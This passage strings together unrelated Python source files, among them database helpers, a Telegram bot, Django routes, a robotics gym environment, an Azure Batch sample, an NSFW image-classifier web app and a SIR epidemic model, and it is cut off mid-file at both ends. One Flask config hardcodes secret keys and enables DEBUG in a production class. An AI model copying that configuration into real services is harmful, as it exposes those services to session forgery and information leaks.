dst_id=row[3]) else: p = None cur.close() conn.close() return p def insert_package(self, package): #inserts a new package into the database. #connect to db conn = pymysql.connect(user=self.username, password=self.password, host=self.host, database=self.db) cur = conn.cursor() # Insert new package add_package_sql = \ """ INSERT INTO package(pkgid, packagesize_id, src_id, dst_id) VALUES (%s, %s, %s, %s) """ cur.execute(add_package_sql, (package.id, package.size_id, package.src_id, package.dst_id)) conn.commit() cur.close() conn.close() # to do add cool querie functions to see who has most packagees etc. 0 import os from typing import List DOWNLOAD_LOCATION = "data/downloaded/" RESIZED_LOCATION = "data/resized/" ALIGNED_LOCATION = "data/aligned/" ANNOTATED_LOCATION = "data/annotated/" def get_images_in_dir(path: str) -> List[str]: """Returns a sorted list of all filenames of PNG files in directory. PNG should begin with a number, followed by underscore (e.g. 10_hello.png). This number is the key for sorting. """ return sorted([f for f in os.listdir(path) if f.endswith(".png")], key=lambda f: int(f.split("_")[0])) bot/telegram_bot.py import telegram import key from ndb_user import NDB_User import time ''' python-telegram-bot documentation https://python-telegram-bot.readthedocs.io/en/stable/ ''' TELEGRAM_BOT = telegram.Bot(token=key.TELEGRAM_API_TOKEN) def set_webhook(): s = TELEGRAM_BOT.setWebhook(key.WEBHOOK_TELEGRAM_BASE, allowed_updates=['message']) if s: print("webhook setup ok: {}".format(key.WEBHOOK_TELEGRAM_BASE)) else: return "webhook setup failed" def delete_webhook(): TELEGRAM_BOT.deleteWebhook() def get_webhook_info(): print(TELEGRAM_BOT.get_webhook_info()) def get_reply_markup(user, kb, remove_keyboard): reply_markup = None if kb or remove_keyboard: if remove_keyboard: user.set_empy_keyboard() reply_markup = telegram.ReplyKeyboardRemove() else: user.set_keyboard(kb) reply_markup = telegram.ReplyKeyboardMarkup(kb, resize_keyboard=True) return reply_markup def send_message(user, text, kb=None, remove_keyboard=False, markdown=True, sleep=False, **kwargs): #sendMessage(chat_id, text, parse_mode=None, disable_web_page_preview=None, disable_notification=False, # reply_to_message_id=None, reply_markup=None, timeout=None, **kwargs) chat_id = user.serial_number if isinstance(user, NDB_User) else user reply_markup = get_reply_markup(user, kb, remove_keyboard) parse_mode = telegram.ParseMode.MARKDOWN if markdown else None TELEGRAM_BOT.sendMessage( chat_id = chat_id, text = text, reply_markup = reply_markup, parse_mode = parse_mode, **kwargs ) if sleep: time.sleep(0.1) def send_typing_action(user, sleep_secs=None): chat_id = user.serial_number if isinstance(user, NDB_User) else user TELEGRAM_BOT.sendChatAction( chat_id = chat_id, action = telegram.ChatAction.TYPING ) if sleep_secs: time.sleep(sleep_secs) djinnome/indra from copy import deepcopy from indra.databases import hgnc_client from indra.statements import Agent, IncreaseAmount, DecreaseAmount, Evidence class TrrustProcessor(object): """Processor to extract INDRA Statements from Trrust data frame. Attributes ---------- df : pandas.DataFrame The Trrust table to process. statements : list[indra.statements.Statement] The list of INDRA Statements extracted from the table. """ def __init__(self, df): self.df = df self.statements = [] def extract_statements(self): """Process the table to extract Statements.""" for _, (tf, target, effect, refs) in self.df.iterrows(): tf_agent = get_grounded_agent(tf) target_agent = get_grounded_agent(target) if effect == 'Activation': stmt_cls = IncreaseAmount elif effect == 'Repression': stmt_cls = DecreaseAmount else: continue pmids = refs.split(';') for pmid in pmids: stmt = make_stmt(stmt_cls, tf_agent, target_agent, pmid) self.statements.append(stmt) def make_stmt(stmt_cls, tf_agent, target_agent, pmid): """Return a Statement based on its type, agents, and PMID.""" ev = Evidence(source_api='trrust', pmid=pmid) return stmt_cls(deepcopy(tf_agent), deepcopy(target_agent), evidence=[ev]) def get_grounded_agent(gene_name): """Return a grounded Agent based on an HGNC symbol.""" db_refs = {'TEXT': gene_name} if gene_name in hgnc_map: gene_name = hgnc_map[gene_name] hgnc_id = hgnc_client.get_hgnc_id(gene_name) if not hgnc_id: hgnc_id = hgnc_client.get_current_hgnc_id(gene_name) if hgnc_id: db_refs['HGNC'] = hgnc_id up_id = hgnc_client.get_uniprot_id(hgnc_id) if up_id: db_refs['UP'] = up_id agent = Agent(gene_name, db_refs=db_refs) return agent hgnc_map = { 'CTGF': 'CCN2', 'CYR61': 'CCN1', 'MKL1': 'MRTFA', 'NOV': 'CCN3', 'RFWD2': 'COP1', 'SALL4A': 'SALL4', 'STAT5': 'STAT5A', 'TRAP': 'ACP5', 'AES': 'TLE5', 'SEPT7': 'SEPTIN7' } # -*- coding: utf-8 -*- from django.urls import path from . import views from .views import (ReportListView, DocListView, PatListView, ReportDetailView, ReportCreateView, ReportUpdateView, ReportDeleteView, PatientCreateView, PatientDeleteView, PatientUpdateView, DocReportListView, PatReportListView) urlpatterns = [ path('', ReportListView.as_view(), name='Hospital-Home'), # path('', views.home, name='Hospital-Home'), path('about/', views.about, name='Hospital-About'), path('diagreport//', ReportDetailView.as_view(), name='report-detail'), path('diagreport/new/', ReportCreateView.as_view(), name='report-create'), path('diagreport//update/', ReportUpdateView.as_view(), name='report-update'), path('diagreport//delete/', ReportDeleteView.as_view(), name='report-delete'), path('patient/new/>', PatientCreateView.as_view(), name='patient-create'), path('patient//update/', PatientUpdateView.as_view(), name='patient-update'), path('patient//delete/', PatientDeleteView.as_view(), name='patient-delete'), path('user//', DocReportListView.as_view(), name='Doc-Report'), path('patient//', PatReportListView.as_view(), name='Pat-Report'), path('listdocs/', DocListView.as_view(), name='Doc-List'), path('listpats//', PatListView.as_view(), name='Pat-List') ] y0psolo/YAD load("@bazel_tools//tools/build_defs/repo:http.bzl", "http_archive") def hadoop_repository(): http_archive( name = "hadoop_3", build_file = "//ext/hadoop:BUILD", sha256 = "ad770ae3293c8141cc074df4b623e40d79782d952507f511ef0a6b0fa3097bac", strip_prefix = "hadoop-3.3.1/", urls = ["https://dlcdn.apache.org/hadoop/common/hadoop-3.3.1/hadoop-3.3.1.tar.gz"], ) ghliu/10703_HW3deerl_hw3_src/deeprl_hw3/arm_env.py """2-link Planar Arm.""" import numpy as np import gym import gym.spaces class TwoLinkArmEnv(gym.core.Env): DOF = 2 metadata = { 'render.modes': ['human', 'rgb_array'], 'video.frames_per_second': 15 } def __init__(self, Q=None, R=None, goal_q=None, init_q=None, init_dq=None, dt=1e-3, l1=.5, l2=.75, m1=.33, m2=.55, izz1=15., izz2=8., noise_free=True, noise_mu=None, noise_sigma=None): self.observation_space = gym.spaces.Box( low=np.array([-np.pi, -np.pi, -np.inf, -np.inf]), high=np.array([np.pi, np.pi, np.inf, np.inf])) self.action_space = gym.spaces.Box( low=np.array([-np.inf, -np.inf]), high=np.array([np.inf, np.inf])) if Q is None: self.Q = np.zeros((self.DOF * 2, self.DOF * 2)) self.Q[:self.DOF, :self.DOF] = np.eye(self.DOF) * 1000.0 else: self.Q = Q if R is None: self.R = np.eye(self.DOF) * 0.001 else: self.R = R self.dt = dt self._goal_q = goal_q self.goal_dq = np.zeros(self.DOF) self.init_q = np.zeros(self.DOF) if init_q is None else init_q self.init_dq = np.zeros(self.DOF) if init_dq is None else init_dq self.l1 = l1 self.l2 = l2 self.m1 = m1 self.m2 = m2 self.izz1 = izz1 self.izz2 = izz2 self.K1 = ((1 / 3. * self.m1 + self.m2) * self.l1**2. + 1 / 3. * self.m2 * self.l2**2.) self.K2 = self.m2 * self.l1 * self.l2 self.K3 = 1 / 3. * self.m2 * self.l2**2. self.K4 = 1 / 2. * self.m2 * self.l1 * self.l2 # how much noise to add to input signal self.noise_free = noise_free self.noise_mu = np.zeros( (self.DOF, )) if noise_mu is None else noise_mu self.noise_sigma = np.ones( (self.DOF, )) if noise_sigma is None else noise_sigma self.reset() self.viewer = None def get_jacobian(self): jacobian = np.zeros((self.DOF, self.DOF)) jacobian[0, 1] = self.l2 * -np.sin(self.q[0] + self.q[1]) jacobian[1, 1] = self.l2 * np.cos(self.q[0] + self.q[1]) jacobian[0, 0] = self.l1 * -np.sin(self.q[0]) + jacobian[0, 1] jacobian[1, 0] = self.l1 * np.cos(self.q[0]) + jacobian[1, 1] return jacobian def _reset(self): if self._goal_q is None: self.goal_q = (2 * np.pi) * np.random.rand(self.DOF) - np.pi else: self.goal_q = self._goal_q.copy() self.q = self.init_q.copy() self.dq = self.init_dq.copy() self.t = 0. return np.hstack((self.q, self.dq)) @property def position(self): return np.copy(self.q) @property def velocity(self): return np.copy(self.dq) @property def state(self): return np.hstack((self.q, self.dq)) @state.setter def state(self, value): self.q = value[:self.DOF, ...] self.dq = value[self.DOF:, ...] @property def goal(self): return np.hstack((self.goal_q, self.goal_dq)) def _step(self, u, dt=None): if dt is None: dt = self.dt if not self.noise_free: u0_noise = np.random.normal(self.noise_mu[0], self.noise_sigma[0]) u1_noise = np.random.normal(self.noise_mu[1], self.noise_sigma[1]) u[0] += u0_noise u[1] += u1_noise u = np.clip(u, self.action_space.low, self.action_space.high) C2 = np.cos(self.q[1]) S2 = np.sin(self.q[1]) M11 = (self.K1 + self.K2 * C2) M12 = (self.K3 + self.K4 * C2) M21 = M12 M22 = self.K3 H1 = (-self.K2 * S2 * self.dq[0] * self.dq[1] - 1 / 2.0 * self.K2 * S2 * self.dq[1]**2.0) H2 = 1 / 2. * self.K2 * S2 * self.dq[0]**2. ddq1 = ((H2 * M11 - H1 * M21 - M11 * u[1] + M21 * u[0]) / (M12**2. - M11 * M22)) ddq0 = (-H2 + u[1] - M22 * ddq1) / M21 self.dq += np.array([ddq0, ddq1]) * dt self.q += self.dq * dt self.t += dt # calculate the reward x_diff = np.hstack((self.q, self.dq)) - np.hstack( (self.goal_q, self.goal_dq)) reward = -x_diff.dot(self.Q).dot(x_diff) - u.dot(self.R).dot(u) reward *= self.dt is_done = False if np.allclose( self.goal_q, self.q, atol=.01) and np.allclose( self.goal_dq, self.dq, atol=.01): is_done = True return np.hstack((self.q, self.dq)), reward, is_done, {} def _render(self, mode='human', close=False): if close: if self.viewer is not None: self.viewer.close() self.viewer = None return from gym.envs.classic_control import rendering l, r, t, b = 0, 1, .1, -.1 if self.viewer is None: self.viewer = rendering.Viewer(500, 500) max_arm_length = 2 * self.l1 + self.l2 bounds = 1.5 * max_arm_length self.viewer.set_bounds(-bounds, bounds, -bounds, bounds) # add goal geoms link1_goal = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)]) link1_goal_transform = rendering.Transform(rotation=self.goal_q[0]) link1_goal.add_attr(link1_goal_transform) link1_goal._color.vec4 = (1., 0., 0., 0.25) self.viewer.add_onetime(link1_goal) p1_goal = [ 2 * self.l1 * np.cos(self.goal_q[0]), 2 * self.l1 * np.sin(self.goal_q[0]) ] link2_goal = rendering.FilledPolygon([(l, b), (l, t), (r, t), (r, b)]) link2_goal_transform = rendering.Transform( rotation=self.goal_q[0] + self.goal_q[1], translation=tuple(p1_goal)) link2_goal.add_attr(link2_goal_transform) link2_goal._color.vec4 = (0., 0., 1., 0.25) self.viewer.add_onetime(link2_goal) p1 = [2 * self.l1 * np.cos(self.q[0]), 2 * self.l1 * np.sin(self.q[0])] # add the arm geoms link1 = self.viewer.draw_polygon([(l, b), (l, t), (r, t), (r, b)]) link1_transform = rendering.Transform(rotation=self.q[0]) link1.add_attr(link1_transform) link1.set_color(1., 0., 0.) link2 = self.viewer.draw_polygon([(l, b), (l, t), (r, t), (r, b)]) link2_transform = rendering.Transform( rotation=self.q[0] + self.q[1], translation=tuple(p1)) link2.add_attr(link2_transform) link2.set_color(0., 0., 1.) return self.viewer.render(return_rgb_array=(mode == 'rgb_array')) class LimitedTorqueTwoLinkArmEnv(TwoLinkArmEnv): def __init__(self, max_torques=None, **kwargs): super(LimitedTorqueTwoLinkArmEnv, self).__init__(**kwargs) if max_torques is None: max_torques = np.array([10.0, 10.0]) self.action_space = gym.spaces.Box(low=-max_torques, high=max_torques) # Copyright 2018 JanusGraph Python Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from gremlin_python.process.traversal import P class Geo(object): """ This class implements all the JanusGraph-based Geo Predicates. """ @staticmethod def geoContains(value): """ The method is used for JanusGraph geoContains predicate. GeoContains predicate holds true when one object is contained by another. The query returns the GeoShapes which contains the GeoShape being passed/queried. Args: value (GeoShape): The GeoShape to query for and return all results which are present inside this GeoShape Returns: bool: Returns true iff the GeoShape contains the value being queried """ return P("geoContains", value) @staticmethod def geoWithin(value): """ The method is used for JanusGraph geoWithin predicate. GeoWithin predicate holds true when one object is within another. The query returns the GeoShapes which are present inside/within the GeoShape being passed/queried. Args: value (GeoShape): The GeoShape to query for and return all results within this this GeoShape if present. Returns: bool: Returns true iff the GeoShape is within the value being queried """ return P("geoWithin", value) ammyg/TUMcalendarTUMCalendarTools/apps.py1-10 from django.apps import AppConfig class TumcalendartoolsConfig(AppConfig): name = 'TUMCalendarTools' ov1d1u/telepatmanager from PyQt5 import QtGui, QtWidgets from PyQt5.QtCore import QCoreApplication class ModelItem(QtGui.QStandardItem): def __init__(self, name, model): self.name = name self.model = model icon = QCoreApplication.instance().style().standardIcon(QtWidgets.QStyle.SP_FileIcon) super(ModelItem, self).__init__(icon, name) def show_name(self, show): pass #!/usr/bin/env python # -*- coding: utf-8 -*- import os basedir = os.path.abspath(os.path.dirname(__file__)) ''' This file houses the config files for the whole of the project. There are 3 types of config. 1. Production : That you may set on Production 2. ProdDemo : for engineerinme.com 3. Development : local testing ''' class Config(object): FAS_OPENID_ENDPOINT = 'http://id.fedoraproject.org/' FAS_CHECK_CERT = True ADMIN_GROUP = ['provenpackager', 'summer-coding '] # Also, defined in the modules/admin/views.py WHOOSH_BASE = os.path.join(basedir, 'search') DEBUG = True MAIL_SERVER = 'smtp.gmail.com' MAIL_PORT = 465 MAIL_USE_TLS = False MAIL_USE_SSL = True MAIL_USERNAME = '', MAIL_PASSWORD = '********', EXTERNAL_URL = "http://demo.engineerinme.com" ADMINS = ['', ''] UPLOAD_TOPIC = "fedoracollege.media.upload" CONTENT_EDIT_TOPIC = "fedoracollege.content.edit" CONTENT_CREATE_TOPIC = "fedoracollege.content.added" ALLOWED_EXTENSIONS = { 'video': ['ogg', 'ogv'], 'image': ['jpeg', 'png', 'jpg'], 'doc': ['pdf'], 'audio': ['mp3', 'flac'] } CSRF_ENABLED = True CSRF_SESSION_KEY = "f3do$a" class ProductionConfig(Config): DEBUG = True SECRET_KEY = 'FEDORA-DEMO' PGSQL_USER = "postgres" PGSQL_PASS = "" PGSQL_DATABASE = "fedora" SQLALCHEMY_DATABASE_URI = "postgresql://" + \ PGSQL_USER + ":" + PGSQL_PASS + "@localhost/" + PGSQL_DATABASE SQLALCHEMY_ECHO = False DEBUG_TOOLBAR = False UPLOADS_FOLDER = '/home/engineer/fedora-college/' + \ 'fedora_college/static/uploads/' STATIC_FOLDER = '/home/engineer/fedora-college/fedora_college/static' # DEBUG = False # TESTING = False # DEBUG_TB_PROFILER_ENABLED = False # DEBUG_TB_INTERCEPT_REDIRECTS = False class ProductionConfigDemo(Config): DEBUG = True SECRET_KEY = 'FEDORA-DEMO' PGSQL_USER = "postgres" PGSQL_PASS = "" PGSQL_DATABASE = "fedora" SQLALCHEMY_DATABASE_URI = "postgresql://" + \ PGSQL_USER + ":" + PGSQL_PASS + "@localhost/" + PGSQL_DATABASE DEBUG_TOOLBAR = True SQLALCHEMY_ECHO = True UPLOADS_FOLDER = '/home/engineer/fedora-college/' + \ 'fedora_college/static/uploads/' STATIC_FOLDER = '/home/engineer/fedora-college/fedora_college/static' class DevelopmentConfig(Config): DEBUG = True SECRET_KEY = 'FEDORA-DEMO' SQLALCHEMY_DATABASE_URI = 'sqlite:///' + os.path.join(basedir, 'fedoracollege.db') DEBUG_TOOLBAR = True SQLALCHEMY_ECHO = True DATABASE_CONNECT_OPTIONS = {} UPLOADS_FOLDER = os.path.realpath('.') + '/fedora_college/static/uploads/' STATIC_FOLDER = os.path.realpath('.') + '/fedora_college/static/' class TestingConfig(Config): TESTING = True SECRET_KEY = 'FEDORA-TEST' ((yield from abc) for x in iter) # EXPECTED: [ ..., CODE_START(''), ..., LOAD_GLOBAL('abc'), GET_YIELD_FROM_ITER(0), LOAD_CONST(None), YIELD_FROM(0), YIELD_VALUE(0), ... ] xltpl/config.py class Config(): def __init__(self): self.debug = False config = Config()Azure/azure-batch-apps-python #------------------------------------------------------------------------- # The Azure Batch Apps Python Client # # Copyright (c) Microsoft Corporation. All rights reserved. # # The MIT License (MIT) # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the ""Software""), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # #-------------------------------------------------------------------------- """ A sample script showing use of the batchapps module to construct and submit an arbitrary job. """ import getpass import sys import webbrowser from batchapps import ( FileManager, JobManager, Credentials, Configuration) from batchapps.credentials import AzureOAuth from batchapps.exceptions import ( AuthenticationException, RestCallException, InvalidConfigException) LOG_LEVEL = "debug" ASSET_DIR = "//Path/To/Assets/Directory" # These settings will be specific to a users Batch Apps service. ENDPOINT = "myservice.batchapps.core.windows.net" ACCOUNT_ID = "ClientID=abcd-1234-efgh-5678;TenantID=" ACCOUNT_KEY = "********" def authentication(mode): """ Authenticates a username against a stored password, if any, otherwise requires a password is to be entered. :Args: - cfg (:class:`.Configuration`): an instance of class Configuration as returned by create_config() :Returns: - a :class:`.Credentials` instance object """ try: return AzureOAuth.get_unattended_session(config=mode) except (AuthenticationException, InvalidConfigException) as e: print("Could not get unattended session: {0}".format(e)) try: auth_url = AzureOAuth.get_authorization_url(config=mode)[0] webbrowser.open(auth_url) redirect_url = input("Please enter authentication url: ") return AzureOAuth.get_authorization_token(redirect_url, config=mode) except (AuthenticationException, InvalidConfigException) as e: raise RuntimeError("Failed to authenticate: {0}".format(e)) def create_config(): """ Looks for configuration settings for specified application, otherwise creates new configuration, sets chosen log_level. :Returns: - a :class:`.Configuration` instance object """ global LOG_LEVEL if input("Run in debug mode? (yes/no)")[0].lower() == 'n': LOG_LEVEL = "info" try: # Look for application in existing config file config = Configuration(log_level=LOG_LEVEL, jobtype="MyApp") print("Config found.") return config except InvalidConfigException: print("Valid config not found. Attempting to create new config.") try: config = Configuration(log_level=LOG_LEVEL) config.aad_config(endpoint=ENDPOINT, account=ACCOUNT_ID, key=ACCOUNT_KEY, unattended=True) config.add_jobtype("MyApp") config.current_jobtype("MyApp") # Examples of default config settings for your job config.set("width", "500") config.set("height", "500") # Set MyApp to be the default job type config.set_default_jobtype() except InvalidConfigException as e: raise RuntimeError("Invalid Configuration: {0}".format(e)) finally: config.save_config() return config def submit_job(auth, config): """ Create a new job submission and send it to the cloud. :Args: - auth :class:`.Credentials`: instance of the Credentials class as returned by authentication() - config :class:`.Configuration`: instance of the Configuration class as returned by create_config() """ asset_mgr = FileManager(auth, cfg=config) job_mgr = JobManager(auth, cfg=config) # Converts directory contents to a FileCollection file_collection = asset_mgr.files_from_dir(ASSET_DIR) new_job = job_mgr.create_job("Test Job", files=file_collection) # Set various job parameters. The pre-configured parameters for the # job type can be found using new_job.get_default_params(). new_job.instances = 5 # Number of machines to work on the job. new_job.start = 1 new_job.end = 10 new_job.numFrames = 10 # This sets the file that will be run to start the job. # In this case the first file in the FileCollection. new_job.set_job_file(file_collection[0]) # Upload all files needed for the job. new_job.required_files.upload(threads=4) try: submission = new_job.submit() print("New job submitted with ID: {0}".format(submission['jobId'])) except RestCallException as e: print("Job failed: {0}".format(e)) if __name__ == "__main__": try: cfg = create_config() creds = authentication(cfg) submit_job(creds, cfg) except RuntimeError as exp: print("Job failed: {0}".format(exp)) import time from flask import Flask, render_template, request from werkzeug.utils import secure_filename from werkzeug.exceptions import RequestEntityTooLarge from waitress import serve import cv2 import numpy as np from tensorflow.keras.models import load_model import hddUsage app = Flask(__name__) app.config['MAX_CONTENT_LENGTH'] = 512 * 1024 * 5 last_executed = 0 def predict_images(image_size, image): size = image_size new_model = load_model("models/nsfw_classifier_v9.h5") test = image test_img = cv2.imread(test, cv2.IMREAD_UNCHANGED) test_img_re = cv2.resize(test_img, (size, size), interpolation=cv2.INTER_AREA) print(test_img.shape) test_img = np.expand_dims(test_img_re, axis=0) print(test_img.shape) raw = new_model.predict(test_img) result = raw > 0.5 return result[0][0] @app.route('/upload', endpoint='upload_file') def upload_file(): space_free = hddUsage.get_free_space_mb(".") print("Disk free : {}".format(space_free)) if space_free > 40000: return render_template('upload2.html') else: return render_template('space_error.html') @app.route('/uploader', methods=['GET', 'POST'], endpoint='upload_file2') def upload_file(): global last_executed age = time.time() - last_executed # print("Age : {}".format(age)) if request.method == 'POST' and age >= 6: f = request.files['file'] # print(f.filename) try: if request.files['file'].filename == '': return render_template('upload2.html') else: time_var = int(time.time()) f.save("images/{}_{}.{}".format(secure_filename(f.filename).split(".")[0], time_var, secure_filename(f.filename).split(".")[1])) last_executed = time.time() is_nsfw = predict_images(306, "images/{}_{}.{}".format(secure_filename(f.filename).split(".")[0], time_var, secure_filename(f.filename).split(".")[1])) if is_nsfw: return 'Picture is not safe for work!' else: return 'Picture is probably safe for work!' except Exception as e: # print("Size : {}".format(f.content_length)) return app_handle_413(e) elif age < 60: return 'Time since last operation executed is less than 1 Minute :: Wait for {} Seconds, Please wait.'.format(60 - int(age)) @app.errorhandler(413) @app.errorhandler(RequestEntityTooLarge) def app_handle_413(e): return 'File Too Large :: {}'.format(str(e)), 413 if __name__ == '__main__': # app.run(debug=False) serve(app, host='0.0.0.0', port=5000) ''' Find the smallest cube for which exactly five permutations of its digits are cube. ''' import math, itertools print(math.pow(8, 1/3).is_integer()) tried = {} for i in range(1000, 1200): cb = int(math.pow(i, 3)) #print(cb) #print(math.pow(int(cb), 1/3)) roots = 1 tried[i] = [str(cb)] for x in itertools.permutations(str(cb)): x = ''.join(x) if x not in tried[i]: #print('x =', x) y = round(math.pow(int(x), 1/3)) #print(y**3, x) if y**3 == int(x): roots += 1 tried[i].append(x) print(roots, i, y, x) if roots == 5: print(cb) break huangyonghome/blog10-100 #!/usr/bin/env python # -*- coding:utf-8 -*- # Author:Lyon import greenlet import time def add1(): num = 1 for i in range(10000000): num *= i g2.switch() def add2(): num = 1 for i in range(10000000): num *= i g1.switch() start_time = time.time() g1 = greenlet.greenlet(add1) g2 = greenlet.greenlet(add2) g1.switch() end_time = time.time() print(end_time - start_time) # coding: utf-8 # # SIR version 01.01 # ## El modelo epidémico de SIR # Una descripción matemática simple de la propagación de una enfermedad en una población es el llamado modelo SIR, que divide la población (fija) de N individuos en tres "compartimentos" que pueden variar en función del tiempo, t: # # - S( t) son aquellos susceptibles pero aún no infectados con la enfermedad; # - I( t) es la cantidad de individuos infecciosos; # - R( t) son aquellos individuos que se han recuperado de la enfermedad y ahora tienen inmunidad contra ella. # # El modelo SIR describe el cambio en la población de cada uno de estos compartimentos en términos de dos parámetros, $\beta$ y $\gamma$. # # $\beta$ describe la tasa de contacto efectiva de la enfermedad: un individuo infectado entra en contacto con otros $\beta \cdot N$ individuos por unidad de tiempo (de los cuales la fracción que es susceptible a contraer la enfermedad es $S/N$) $\gamma$ es la tasa de recuperación media: es decir, $\frac{1}{\gamma}$ es el período de tiempo promedio durante el cual un individuo infectado puede transmitirlo. # Además hemos incluido el caso de decesos, los que representamos con el factor $\mu$. # Las ecuaciones diferenciales que describen este modelo fueron derivadas primero por Kermack y McKendrick [Proc.R.Soc.A,115,772(1927)]: # # $$\frac{dS}{dt}=−\beta \cdot \frac{S \cdot I}{N}$$ # # $$ \frac{dI}{dt} =\beta \cdot \frac{S\cdot I}{N}−\gamma \cdot I - \mu \cdot I$$ # # $$\frac{dR}{dt} = \gamma \cdot I $$ # # $$\frac{dr}{dt} = \mu \cdot I $$ # # El siguiente código de Python integra estas ecuaciones para una enfermedad caracterizada por los parámetros β = 0.2, 1/γ = 10 [dias] en una población de N = 1000 (quizás 'gripe en una escuela). # # El modelo se inicia con una sola persona infectada el día 0: I( 0 ) = 1. # # Las curvas trazadas de S(t), I(t) y R(t) están diseñados para ver los resultados obtenidos. # In[37]: import numpy as np from scipy.integrate import odeint import matplotlib.pyplot as plt # In[10]: # Una cuadrícula de puntos de tiempo (en días). t = np.linspace(0, 160, 160) # In[15]: # Las ecuaciones diferenciales del modelo SIR. def deriv(y, t, N, beta, gamma, mu): S, I, R, r = y dSdt = -beta * S * I / N dIdt = beta * S * I / N - gamma * I - mu * I dRdt = gamma * I drdt = mu * I return dSdt, dIdt, dRdt, drdt # In[16]: # Población total, N. N = 10000 # Número inicial de individuos infectados, recuperados y fallecidos, I0, R0 y r0. I0, R0, r0 = 1, 0, 0 # Todos los demás, S0, son susceptibles a la infección inicialmente. S0 = N - I0 - R0 - r0 # In[36]: # beta: tasa media de contacto, # gamma (en 1/dias): tasa media de recuperación. # mu: tasa media de decesos # 0.28 beta, gamma, mu = 0.335, 1./14, 0.006 # In[ ]: # Vector de condiciones iniciales y0 = S0, I0, R0, r0 # In[18]: # Integra las ecuaciones SIR sobre la cuadrícula de tiempo, t. ret = odeint(deriv, y0, t, args=(N, beta, gamma, mu)) S, I, R, r = ret.T # In[35]: # Grafico los datos en tres curvas separadas para S(t), I(t) y R(t) with plt.style.context('seaborn'): plt.plot(t, S, 'b', alpha=0.5, lw=2, label='Susceptibles') plt.plot(t, I, 'r', alpha=0.5, lw=2, label='Infectados') plt.plot(t, R, 'g', alpha=0.5, lw=2, label='Recuperados con inmunidad') plt.plot(t, r, 'k', alpha=0.5, lw=2, label='Decesos') plt.xlabel('Tiempo [días]') plt.ylabel('Número ('+str(N)+'%)') plt.ylim(-N/20,N*1.1) plt.xlim(0, 120) plt.grid(b=True, which='major', c='w', lw=2, ls='-') plt.legend(loc= 'upper left', prop={'size': 16}) plt.show() uniq.py10-100 import numpy as np import torch.nn as nn import actquant import quantize def save_state(self, _): self.full_parameters = {} layers_list = self.layers_list() layers_steps = self.layers_steps() self.full_parameters = quantize.backup_weights(layers_list, {}) if self.quant and not self.training and not self.statistics_phase: for i in range(len(layers_steps)): self.quantize.quantize_uniform_improved(layers_steps[i]) if self.quantize.hardware_clamp: self.quantize.assign_act_clamp_during_val(layers_list) self.quantize.assign_weight_clamp_during_val(layers_list) elif self.quant and self.training: if self.allow_grad: for i in range(self.quant_stage_for_grads): self.quantize.quantize_uniform_improved(layers_steps[i]) else: if self.noise: self.quantize.add_improved_uni_noise(layers_steps[self.training_stage]) for i in range(self.training_stage): self.quantize.quantize_uniform_improved(layers_steps[i]) def restore_state(self, _, __): layers_list = self.layers_list() quantize.restore_weights(layers_list, self.full_parameters) class UNIQNet(nn.Module): def __init__(self, quant_epoch_step,quant_start_stage, quant=False, noise=False, bitwidth=32, step=2, quant_edges=True, act_noise=True, step_setup=[15, 9], act_bitwidth=32, act_quant=False, uniq=False, std_act_clamp=5, std_weight_clamp=3.45, wrpn=False,quant_first_layer=False, num_of_layers_each_step=1, noise_mask=0.05): super(UNIQNet, self).__init__() self.quant_epoch_step = quant_epoch_step self.quant_start_stage = quant_start_stage self.quant = quant self.noise = noise self.wrpn = wrpn if isinstance(bitwidth, list): assert (len(bitwidth) == step) self.bitwidth = bitwidth else: self.bitwidth = [bitwidth for _ in range(step)] self.training_stage = 0 self.step = step self.num_of_layers_each_step = num_of_layers_each_step self.act_noise = act_noise self.act_quant = act_quant self.act_bitwidth = act_bitwidth self.quant_edges = quant_edges self.quant_first_layer = quant_first_layer self.register_forward_pre_hook(save_state) self.register_forward_hook(restore_state) self.layers_b_dict = None self.noise_mask_init = 0. if not noise else noise_mask self.quantize = quantize.quantize(bitwidth, self.act_bitwidth, None, std_act_clamp=std_act_clamp, std_weight_clamp=std_weight_clamp, noise_mask=self.noise_mask_init) self.statistics_phase = False self.allow_grad = False self.random_noise_injection = False self.open_grad_after_each_stage = True self.quant_stage_for_grads = quant_start_stage self.noise_level = 0 self.noise_batch_counter = 0 def layers_list(self): modules_list = list(self.modules()) quant_layers_list = [x for x in modules_list if isinstance(x, nn.Conv2d) or isinstance(x, nn.Linear) or isinstance(x, actquant.ActQuant) or isinstance(x, actquant.ActQuantDeepIspPic) or isinstance(x, actquant.ActQuantWRPN) or isinstance(x, nn.BatchNorm2d)] if not self.quant_edges: if self.act_quant: quant_layers_list[-2].quant = False quant_layers_list = quant_layers_list[1:-2] else: quant_layers_list = quant_layers_list[1:-1] else: if not self.quant_first_layer: quant_layers_list = quant_layers_list[1:] #remove first weight. this mode quant last layer, but not first return quant_layers_list def layers_steps(self): split_layers = self.split_one_layer_with_parameter_in_step() return split_layers def count_of_parameters_layer_in_list(self,list): counter = 0 for layer in list: if isinstance(layer, nn.Conv2d) or isinstance(layer, nn.Linear): counter += 1 return counter def split_one_layer_with_parameter_in_step(self): layers = self.layers_list() splited_layers = [] split_step = [] for layer in layers: if (isinstance(layer, nn.Conv2d) or isinstance(layer, nn.Linear)) and self.count_of_parameters_layer_in_list(split_step) == 